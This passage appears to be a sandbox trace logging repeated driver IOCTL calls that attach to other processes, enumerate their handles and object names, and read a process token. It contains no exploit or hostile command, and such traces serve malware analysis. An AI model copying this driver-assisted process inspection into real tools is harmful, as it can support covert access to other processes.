HandleInformation=0x0) returned 0x0 [0223.454] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.454] PsReleaseProcessExitSynchronization () returned 0x2 [0223.454] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.454] ObQueryNameString (in: Object=0xfffffa800374cd00, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.454] ObfDereferenceObject (Object=0xfffffa800374cd00) returned 0x2 [0223.454] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.454] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.454] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.454] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.455] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.455] PsAcquireProcessExitSynchronization () returned 0x0 [0223.455] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.455] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374ec90, HandleInformation=0x0) returned 0x0 [0223.455] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.455] PsReleaseProcessExitSynchronization () returned 0x2 [0223.455] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.455] ObQueryNameString (in: Object=0xfffffa800374ec90, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.455] ObfDereferenceObject (Object=0xfffffa800374ec90) returned 0x2 [0223.455] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.455] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.455] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.455] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0223.455] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.455] PsAcquireProcessExitSynchronization () returned 0x0 [0223.455] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.455] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374e980, HandleInformation=0x0) returned 0x0 [0223.455] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.455] PsReleaseProcessExitSynchronization () returned 0x2 [0223.455] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.455] ObQueryNameString (in: Object=0xfffffa800374e980, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.456] ObfDereferenceObject (Object=0xfffffa800374e980) returned 0x2 [0223.456] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.456] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.456] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.456] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.456] PsAcquireProcessExitSynchronization () returned 0x0 [0223.456] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.456] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374ff20, HandleInformation=0x0) returned 0x0 [0223.456] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.456] PsReleaseProcessExitSynchronization () returned 0x2 [0223.456] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.456] ObQueryNameString (in: Object=0xfffffa800374ff20, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.456] ObfDereferenceObject (Object=0xfffffa800374ff20) returned 0x2 [0223.456] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.456] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.456] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.456] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.456] PsAcquireProcessExitSynchronization () returned 0x0 [0223.456] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.457] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003751c80, HandleInformation=0x0) returned 0x0 [0223.457] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.457] PsReleaseProcessExitSynchronization () returned 0x2 [0223.457] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.457] ObQueryNameString (in: Object=0xfffffa8003751c80, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.457] ObfDereferenceObject (Object=0xfffffa8003751c80) returned 0x2 [0223.457] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.457] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.457] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.457] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0223.457] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.457] PsAcquireProcessExitSynchronization () returned 0x0 [0223.457] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.457] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037529a0, HandleInformation=0x0) returned 0x0 [0223.457] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.457] PsReleaseProcessExitSynchronization () returned 0x2 [0223.457] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.457] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.457] ObfDereferenceObject (Object=0xfffffa80037529a0) returned 0x1 [0223.457] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.457] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.457] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.459] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0223.459] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.459] PsAcquireProcessExitSynchronization () returned 0x0 [0223.459] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.459] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003754f20, HandleInformation=0x0) returned 0x0 [0223.459] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.459] PsReleaseProcessExitSynchronization () returned 0x2 [0223.459] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.459] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.459] ObfDereferenceObject (Object=0xfffffa8003754f20) returned 0x1 [0223.459] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.459] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.460] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.460] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.460] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.460] PsAcquireProcessExitSynchronization () returned 0x0 [0223.460] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.460] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003758f20, HandleInformation=0x0) returned 0x0 [0223.460] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.460] PsReleaseProcessExitSynchronization () returned 0x2 [0223.460] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.460] ObQueryNameString (in: Object=0xfffffa8003758f20, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.460] ObfDereferenceObject (Object=0xfffffa8003758f20) returned 0x2 [0223.460] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.461] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.461] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.461] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.461] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.461] PsAcquireProcessExitSynchronization () returned 0x0 [0223.461] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.461] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003761880, HandleInformation=0x0) returned 0x0 [0223.461] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.461] PsReleaseProcessExitSynchronization () returned 0x2 [0223.461] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.461] ObQueryNameString (in: Object=0xfffffa8003761880, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.461] ObfDereferenceObject (Object=0xfffffa8003761880) returned 0x2 [0223.462] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.462] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.462] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.462] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.462] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.462] PsAcquireProcessExitSynchronization () returned 0x0 [0223.462] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.462] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037639a0, HandleInformation=0x0) returned 0x0 [0223.462] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.462] PsReleaseProcessExitSynchronization () returned 0x2 [0223.462] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.462] ObQueryNameString (in: Object=0xfffffa80037639a0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.462] ObfDereferenceObject (Object=0xfffffa80037639a0) returned 0x1 [0223.463] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.463] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.463] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.463] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.463] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.463] PsAcquireProcessExitSynchronization () returned 0x0 [0223.463] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.463] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003765b30, HandleInformation=0x0) returned 0x0 [0223.463] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.463] PsReleaseProcessExitSynchronization () returned 0x2 [0223.463] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.463] ObQueryNameString (in: Object=0xfffffa8003765b30, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.463] ObfDereferenceObject (Object=0xfffffa8003765b30) returned 0x2 [0223.464] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.464] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.464] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.464] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0223.464] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.464] PsAcquireProcessExitSynchronization () returned 0x0 [0223.464] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.464] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037659e0, HandleInformation=0x0) returned 0x0 [0223.464] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.464] PsReleaseProcessExitSynchronization () returned 0x2 [0223.464] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.464] ObQueryNameString (in: Object=0xfffffa80037659e0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.464] ObfDereferenceObject (Object=0xfffffa80037659e0) returned 0x1 [0223.464] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.465] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.465] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.465] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.465] PsAcquireProcessExitSynchronization () returned 0x0 [0223.465] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.465] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.465] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.465] PsReleaseProcessExitSynchronization () returned 0x2 [0223.465] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.465] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.466] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.466] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.466] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.466] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.466] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.466] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.466] PsAcquireProcessExitSynchronization () returned 0x0 [0223.466] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.466] ObReferenceObjectByHandle (in: Handle=0x23c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.466] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.466] PsReleaseProcessExitSynchronization () returned 0x2 [0223.466] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.467] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.467] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.467] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.467] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xc8 [0223.467] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0223.467] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003762b30, HandleInformation=0x0) returned 0x0 [0223.467] ObOpenObjectByPointer (in: Object=0xfffffa8003762b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0223.467] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc4 [0223.467] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8001f2efc0 | out: TokenHandle=0xfffffa8001f2efc0*=0xc4) returned 0x0 [0223.467] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0223.467] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.468] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0223.468] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0223.470] CloseHandle (hObject=0xc4) returned 1 [0223.470] CloseHandle (hObject=0xc8) returned 1 [0223.470] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0223.470] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.470] PsAcquireProcessExitSynchronization () returned 0x0 [0223.470] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.470] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375adc0, HandleInformation=0x0) returned 0x0 [0223.470] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.470] PsReleaseProcessExitSynchronization () returned 0x2 [0223.470] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.470] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, 